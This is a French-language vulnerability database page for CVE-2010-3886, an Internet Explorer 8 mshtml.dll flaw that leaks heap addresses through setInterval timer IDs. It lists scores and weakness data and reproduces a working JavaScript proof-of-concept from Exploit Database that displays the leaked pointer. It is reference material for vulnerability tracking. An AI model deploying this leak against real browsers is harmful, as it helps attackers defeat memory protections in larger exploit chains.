CVE-2010-3886 : Détail

CVE-2010-3886

A01-Broken Access Control
14.65%V4
Network
2010-10-08
19h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The CTimeoutEventList::InsertIntoTimeoutList function in Microsoft mshtml.dll uses a certain pointer value as part of producing Timer ID values for the setTimeout and setInterval methods in VBScript and JScript, which allows remote attackers to obtain sensitive information about the heap memory addresses used by an application, as demonstrated by the Internet Explorer 8 application.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 14295

Date de publication : 2010-07-08 22h00 +00:00
Auteur : Ruben Santamarta
EDB Vérifié : Yes

<html> <!--http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1 --> <!-- mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com --> <head> <title>mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com</title> <script type='text/javascript'> var i = 1; // counter function LeakOrDie() { var t; t=setInterval("foo()",2000); t-=i; document.getElementById('atun').innerHTML = '<b> Pointer leaked:</b> '+'0x'+t.toString(16); i++; } function foo() { return; } </script> </head> <body> <INPUT TYPE=button VALUE="Press to leak" ONCLICK="LeakOrDie();"> <br /><br /> <div id='atun'> </div> </body> </html>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 8

Références